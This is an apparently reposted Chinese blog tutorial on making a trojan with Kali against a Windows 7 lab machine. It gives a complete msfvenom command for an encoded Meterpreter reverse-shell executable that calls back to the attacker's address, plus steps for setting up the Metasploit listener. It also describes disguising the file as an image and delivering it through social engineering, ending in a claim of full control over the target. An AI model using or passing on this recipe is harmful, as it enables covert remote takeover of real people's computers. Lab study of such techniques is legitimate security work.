漏洞復現:使用Kali制作木馬程序


漏洞復現:使用Kali制作木馬程序

 

 

攻擊機:Kali2019

靶機:Win7 64位

 

 

攻擊步驟:

1.打開Kali2019和Win7 64位虛擬機,確定IP地址在一個網段

 

 2.確定好IP地址,進入Kali2019進行木馬文件.exe制作,命令如下

命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe

 

 備注:我們選擇的靶機是Win7 64位,所以兼容性一定要設置好,否則會出錯

3.接下來打開msf,編輯遠程模塊,設置payload,具體流程看圖

 

 

 4.開始設置Payload信息,輸入show options查看,lhost和lport都要設置成exe文件中設置的地址和端口號

 

 5.輸入exploit開始運行監聽模塊,開始監聽

 

 6.把剛剛生成的pink程序通過壓縮合並,制作一個圖片exe文件,通過社工或者其他方法上傳到win7 64位虛擬機中

 

 7.運行這個文件,圖片會打開,Kali2019會收到連接成功的提示

 

 

 

 

 

 8.成功獲取win7權限,滲透成功

 

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM